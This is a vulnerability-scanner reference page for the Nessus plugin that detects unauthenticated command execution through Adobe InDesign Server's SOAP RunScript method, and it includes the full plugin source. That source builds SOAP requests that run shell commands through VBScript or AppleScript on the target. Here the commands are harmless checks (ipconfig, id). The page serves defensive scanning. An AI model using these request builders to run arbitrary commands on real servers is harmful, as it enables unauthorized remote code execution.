Adobe InDesign Server RunScript Arbitrary Command Execution - Nessus

High   Plugin ID: 65127

This page contains detailed information about the Adobe InDesign Server RunScript Arbitrary Command Execution Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Table Of Contents
hide

Plugin Overview

ID: 65127
Name: Adobe InDesign Server RunScript Arbitrary Command Execution
Filename: adobe_indesign_soap_runscript_rce.nasl
Vulnerability Published: 2012-11-16
This Plugin Published: 2013-03-08
Last Modification Time: 2021-01-19
Plugin Version: 1.5
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: os_fingerprint.nasl, wsdl.nasl
Excluded KB Items [?]: Settings/disable_cgi_scanning

Vulnerability Information

Severity: High
Vulnerability Published: 2012-11-16
Patch Published: N/A
CVE [?]: N/A
CPE [?]: cpe:/a:adobe:indesign

Synopsis

A web service running on the remote host has a command execution vulnerability.

Description

The version of Adobe InDesign Server running on the remote host has an arbitrary command execution vulnerability. When the SOAP service is enabled, it processes requests for the RunScript method without requiring authentication. This method can be used to execute arbitrary VBScript on Windows, or AppleScript on Mac OS. A remote, unauthenticated attacker could exploit this to execute arbitrary code.

Solution

There is no known solution at this time.

Public Exploits

Target Network Port(s): N/A
Target Asset(s): wsdl/adobe_indesign
Exploit Available: True (Metasploit Framework, Exploit-DB)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Adobe InDesign Server RunScript Arbitrary Command Execution vulnerability:

  1. Metasploit: exploit/multi/misc/indesign_server_soap
    [Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution]
  2. Exploit-DB: exploits/multiple/remote/23178.rb
    [EDB-23178: Adobe IndesignServer 5.5 - SOAP Server Arbitrary Script Execution (Metasploit)]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information

CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:U/RC:ND
CVSS Base Score:7.5 (High)
Impact Subscore:6.4
Exploitability Subscore:10.0
CVSS Temporal Score:7.1 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:7.1 (High)

Go back to menu.

Plugin Source

This is the adobe_indesign_soap_runscript_rce.nasl nessus plugin source code. This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof. 

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(65127);
  script_version("1.5");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_bugtraq_id(56574);
  script_xref(name:"EDB-ID", value:"23178");
  script_xref(name:"Secunia", value:"48572");

  script_name(english:"Adobe InDesign Server RunScript Arbitrary Command Execution");
  script_summary(english:"Tries to execute a command");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web service running on the remote host has a command execution
vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of Adobe InDesign Server running on the remote host has an
arbitrary command execution vulnerability.  When the SOAP service is
enabled, it processes requests for the RunScript method without
requiring authentication.  This method can be used to execute arbitrary
VBScript on Windows, or AppleScript on Mac OS.  A remote,
unauthenticated attacker could exploit this to execute arbitrary code."
  );
  script_set_attribute(attribute:"solution", value:"There is no known solution at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2012/11/16");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/08");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:indesign");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("wsdl.nasl", "os_fingerprint.nasl");
  script_require_ports("wsdl/adobe_indesign");
  script_exclude_keys("Settings/disable_cgi_scanning");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

global_var port;
port = get_kb_item_or_exit('wsdl/adobe_indesign');

##
# Sends a RunScript request to the InDesign SOAP Server
#
# @anonparam language the language of the script contained in the RunScript request
# @anonparam script the source code of the script to execute
# @return the resulting RunScriptResponse (an XML string)
##
function _run_script()
{
  local_var language, code, req, res;
  language = _FCT_ANON_ARGS[0];
  code = _FCT_ANON_ARGS[1];

  req =
'<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:IDSP="http://ns.adobe.com/InDesign/soap/">
  <SOAP-ENV:Body>
    <IDSP:RunScript>
      <IDSP:runScriptParameters>
        <IDSP:scriptLanguage>' + language + '</IDSP:scriptLanguage>
        <IDSP:scriptText>' + code + '</IDSP:scriptText>
      </IDSP:runScriptParameters>
    </IDSP:RunScript>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>';

  res = http_send_recv3(
    method:'POST',
    item:'/',
    content_type:'text/xml',
    port:port,
    data:req,
    exit_on_fail:TRUE
  );

  return res[2];
}

##
# Attempts to execute a shell command on a Mac host using AppleScript via a RunScript request
#
# @remark the output that the server sends in its response is the value of the last variable in the script
# @anonparam cmd command to execute
# @return a RunScriptResponse
##
function _run_mac_cmd()
{
  local_var cmd, code;
  cmd = _FCT_ANON_ARGS[0];

  code = 'do shell script "/bin/sh -c ' + cmd + '"';

  return _run_script('applescript', code);
}

##
# Attempts to execute a shell command on a Windows host using VBScript via a RunScript request
#
# @remark the output that the server sends in the response is whatever is
#         assigned to the "returnValue" variable in the script
# @anonparam cmd command to execute. this command is passed directly to "cmd /c"
# @return a RunScriptResponse
##
function _run_windows_cmd()
{
  local_var cmd, code;
  cmd = _FCT_ANON_ARGS[0];

  code =
'set shell = CreateObject("WScript.Shell")
set process = shell.Exec("cmd /c ' + cmd + '")
do while not process.StdOut.AtEndOfStream
    output = output &amp; process.StdOut.ReadLine() &amp; vbLf
loop
returnValue = output';

  return _run_script('visual basic', code);
}

##
# Tries to parse command output from a RunScriptResponse
#
# @anonparam xml SOAP response containing the RunScriptResponse to parse
# @return command output if any was found in 'xml',
#         NULL otherwise
##
function _parse_output()
{
  local_var xml, start_tag, end_tag, output;
  xml = _FCT_ANON_ARGS[0];

  start_tag = stridx(xml, '<scriptResult><data xsi:type="xsd:string">');
  if (start_tag == -1) return NULL;

  end_tag = stridx(xml, '</data>', start_tag + 1);
  if (end_tag == -1) return NULL;

  output = substr(xml, start_tag, end_tag - 1);
  output -= '<scriptResult><data xsi:type="xsd:string">';
  output = str_replace(string:output, find:'&#xA;', replace:'\n');
  return output;
}

##
# Reports the vulnerability and exits
#
# @anonparam cmd shell command that was executed
# @anonparam output command output from running "cmd"
# @remark this function exits before returning
##
function _report_and_exit()
{
  local_var cmd, request, output, report;
  cmd = _FCT_ANON_ARGS[0];
  output = _FCT_ANON_ARGS[1];

  if (report_verbosity > 0)
  {
    report =
      '\nNessus executed "' + cmd + '" by sending the following request :\n\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
      chomp(http_last_sent_request()) + '\n' +
      crap(data:'-', length:30) + " request " + crap(data:'-', length:30) + '\n' +
      '\nWhich resulted in the following command output :\n\n' +
      output = data_protection::sanitize_uid(output:output);
    security_hole(port:port, extra:report);
  }
  else security_hole(port);

  exit(0);
}

# the software only runs on Windows or Mac. We can use the OS fingerprinting
# results as a best guess for which payload to attempt first, but if ends up
# being inaccurate, both payloads will be attempted
os = get_kb_item('Host/OS');
if (isnull(os) || 'Windows' >< os)
  do_windows_poc = TRUE;
else
  do_windows_poc = FALSE;

for (i = 0; i < 2; i++)
{
  if (do_windows_poc)
  {
    cmd = 'ipconfig';
    xml = _run_windows_cmd(cmd);
    output = _parse_output(xml);
    if ('Windows IP Configuration' >< output)
      _report_and_exit(cmd, output);
  }
  else
  {
    cmd = '/usr/bin/id';
    xml = _run_mac_cmd(cmd);
    output = _parse_output(xml);
    if ('uid=' >< output)
      _report_and_exit(cmd, output);
  }

  # 'visual basic' is only valid on Windows, and 'applescript' is only valid
  # on Mac. If the server responds to say the language specified in the request
  # is invalid, that means the plugin used the wrong PoC, and it will try again
  # (at most, two PoCs will be attempted).  if the server doesn't say the language
  # specified was invalid, that means something unexpected happened, which means
  # the bug is probably not exploitable against the target
  if ('Invalid scripting language' >< xml)
    do_windows_poc = do_windows_poc ^ TRUE;
  else
    audit(AUDIT_LISTEN_NOT_VULN, 'InDesign Server SOAP service', port);
}

# i don't think this code is reachable, but it's here just in case
audit(AUDIT_LISTEN_NOT_VULN, 'InDesign Server SOAP service', port);

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/adobe_indesign_soap_runscript_rce.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\adobe_indesign_soap_runscript_rce.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/adobe_indesign_soap_runscript_rce.nasl

Go back to menu.

How to Run

Here is how to run the Adobe InDesign Server RunScript Arbitrary Command Execution as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Adobe InDesign Server RunScript Arbitrary Command Execution plugin ID 65127.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state adobe_indesign_soap_runscript_rce.nasl -t <IP/HOST>

Go back to menu.

References

BID | SecurityFocus Bugtraq ID: Secunia Advisory: See also: Similar and related Nessus plugins:
  • 44937 - Multiple Adobe Products XML External Entity (XXE) Injection (APSB10-05)
  • 99731 - Adobe ColdFusion BlazeDS Java Object Deserialization RCE
  • 66404 - Adobe ColdFusion Multiple Vulnerabilities (APSA13-03)
  • 64689 - Adobe ColdFusion Authentication Bypass (APSB13-03)
  • 66408 - Adobe ColdFusion Authentication Bypass (APSB13-13) (intrusive check)
  • 130263 - Adobe ColdFusion File Upload (APSB18-33) (CVE-2018-15961)
  • 39790 - Adobe ColdFusion FCKeditor 'CurrentFolder' File Upload
  • 48340 - Adobe ColdFusion 'locale' Parameter Directory Traversal
  • 41947 - Adobe RoboHelp Server Security Bypass (APSA09-05 / intrusive check)
  • 41946 - Adobe RoboHelp Server Security Bypass (APSA09-05)

Version

This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file adobe_indesign_soap_runscript_rce.nasl version 1.5. For more plugins, visit the Nessus Plugin Library.

Go back to menu.